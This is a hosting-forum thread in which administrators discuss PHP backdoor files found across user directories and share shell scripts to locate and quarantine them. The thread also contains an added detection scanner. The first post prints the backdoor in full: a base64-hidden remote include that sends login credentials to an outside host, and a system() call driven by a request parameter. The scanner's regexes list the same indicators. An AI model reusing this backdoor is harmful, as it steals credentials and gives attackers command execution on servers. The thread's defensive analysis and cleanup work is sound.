Ack! New Vulnerabilities!

SteveK42 (Verified User, joined Jul 11, 2004, 43 messages)
Not sure if any of you may have fallen to the same issues yet, but I'd recommend you do a "locate" or find of some files...here are some examples:

options.php
layout.php
configs.php
base.php
time.php
date.php
tests.php
fsav.php

There's plenty more out there. These files all contain some dirty code...here's an example:

Code:
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

Not sure exactly what this does, but...

These files will INFEST your server. I have found them in almost EVERY user directory; meaning only safe_mode or suPHP could have stopped it. Cleaning them out is so difficult!

I think this problem is related to Gallery. About 10 of my clients reported broken Gallery templates today and then this happened. However, Wordpress templates were also broken, and phpBBfm templates; they are broken on their own.

It seems that the last two weeks have seen a HUGE jump in vulnerabilities...

Anyone else seeing this? Any ideas? Please?
 
Oh, and another thing...it also puts a .htaccess inside the directory with these phps that calls them on 404, which means you'll NEVER SEE IT in your apache logs.
 
Here, I wrote this to try to cut out these files quickly...

The only thing they don't account for are directories with spaces in the name...

Code:
updatedb
for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties;
  do
    list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers"`
    for i in $list;
      do     
         thecount=`grep base64_encode $i | wc -l`
         if [ $thecount -ne 0 ]; then
           mv $i $i.hackers
         fi
     done
  done

Don't forget to do the updatedb first...and you must run this as root.

If there's a better solution, great...this is the quickest I could come up with.
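As an added example (my own script, not SteveK42's and not from this thread), here is a scanner that addresses the two weak spots of the locate-and-grep approach above: it reads paths with `IFS= read -r` so directories with spaces work, and it scores each PHP file against several of the indicators visible in the posted sample (remote include of a base64_decode'd URL, system() fed from a request parameter, backticked uname, error_reporting(0)) rather than flagging anything that mentions base64_encode. It also lists .htaccess files that route 404s to a PHP script, the trick described for keeping the hits out of the Apache logs. The regexes, the indicator threshold and the fixture directory it builds are my assumptions; the fixture files are constructed test data whose indicator strings sit in PHP comments.

```shell
#!/bin/sh
# Added example, not from the thread: score PHP files by several backdoor
# indicators instead of grepping for base64_encode alone. Paths are read with
# IFS= read -r, so names with spaces work; only names containing a newline
# are not handled.

# Return how many independent indicators a single PHP file matches.
indicator_count() {
    f=$1
    n=0
    # include/require of a base64_decode()d remote URL
    if grep -Eq '(include|require)(_once)?[[:space:]]*\([[:space:]]*base64_decode' "$f"; then n=$((n+1)); fi
    # system() fed straight from a request parameter
    if grep -Eq 'system[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST)' "$f"; then n=$((n+1)); fi
    # shell backticks around uname
    if grep -Eq '`uname' "$f"; then n=$((n+1)); fi
    # error_reporting(0) to hide failures of the remote include
    if grep -Eq 'error_reporting[[:space:]]*\([[:space:]]*0[[:space:]]*\)' "$f"; then n=$((n+1)); fi
    # any base64 use: weak on its own (legitimate webmail code uses it too)
    if grep -Eq 'base64_(en|de)code' "$f"; then n=$((n+1)); fi
    echo "$n"
}

# Print each .php file under $1 that matches at least $2 indicators (default 2).
scan_php_tree() {
    root=$1
    threshold=${2:-2}
    find "$root" -type f -name '*.php' -print |
    while IFS= read -r f; do
        if [ "$(indicator_count "$f")" -ge "$threshold" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Print each .htaccess under $1 that routes 404s to a PHP file. Legitimate
# custom 404 pages match as well, so treat the output as review candidates.
scan_htaccess_tree() {
    find "$1" -type f -name '.htaccess' -print |
    while IFS= read -r h; do
        if grep -Eiq 'ErrorDocument[[:space:]]+404[[:space:]]+[^[:space:]]*\.php' "$h"; then
            printf '%s\n' "$h"
        fi
    done
}

# Move a flagged file aside as the thread does (rename) and drop its
# permissions so nothing can include it under the new name either.
quarantine_file() {
    mv -- "$1" "$1.hackers" && chmod 000 "$1.hackers"
}

# Constructed fixture for trying the scanner offline (assumed layout): one file
# carrying the sample's indicator strings inside PHP comments, one legitimate
# file that merely uses base64_encode, and a 404-routing .htaccess.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/user dir" "$d/webmail"
    cat > "$d/user dir/options.php" <<'EOF'
<?php
// constructed test data: indicator strings only, all commented out
// error_reporting(0);
// if(! @include_once(base64_decode("...") . $user_auth)) {
//   if(isset($_GET["x"])){system($_GET["x"]);} print `uname -a`; }
EOF
    cat > "$d/webmail/password.php" <<'EOF'
<?php
// constructed legitimate file: base64_encode alone is not evidence
$token = base64_encode($session_secret);
EOF
    printf 'ErrorDocument 404 /user%%20dir/options.php\n' > "$d/user dir/.htaccess"
    printf '%s\n' "$d"
}

# Stand-alone use (prints candidates only): sh scan_backdoors.sh --scan /home
if [ "${1-}" = "--scan" ] && [ -n "${2-}" ]; then
    scan_php_tree "$2"
    scan_htaccess_tree "$2"
fi
```

Run it with `--scan` against the document root first and review the list before calling `quarantine_file` on anything; a threshold of 2 keeps the webmail and password-plugin false positives the thread mentions out of the results while still catching the posted sample, which scores 5.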
 
jlasman said:
So why don't you use safe_mode?

Jeff

I know, I need to start...I guess my only concern is how used to non safe mode my customers have gotten...their galleries will no longer work, etc etc.

*sigh*

Decisions.
 
list=`locate $problemfiles.php | grep "\/$problemfiles.php\" | grep -v hackers"`

Change the 3rd line... one syntax error
 
Oops! Problem in the code...here's a working version.

Code:
updatedb
for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties;
do
  list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers`
  for i in $list;
  do
    thecount=`grep base64_encode $i | wc -l`
    if [ $thecount -ne 0 ]; then
      mv $i $i.hackers
    fi
  done
done
 
So far all this has found is 2 user installed copies of uebimiau (why install your own? but people do) and a webmail change password plugin (checked about 36 servers so far, say 3000-5000 domains, about 1/3 of my servers).
 
I have some settings in php.ini and most of my newer servers are set with safe_mode ON by default. Though there's probably 40 servers running safe mode off :( sadly.
 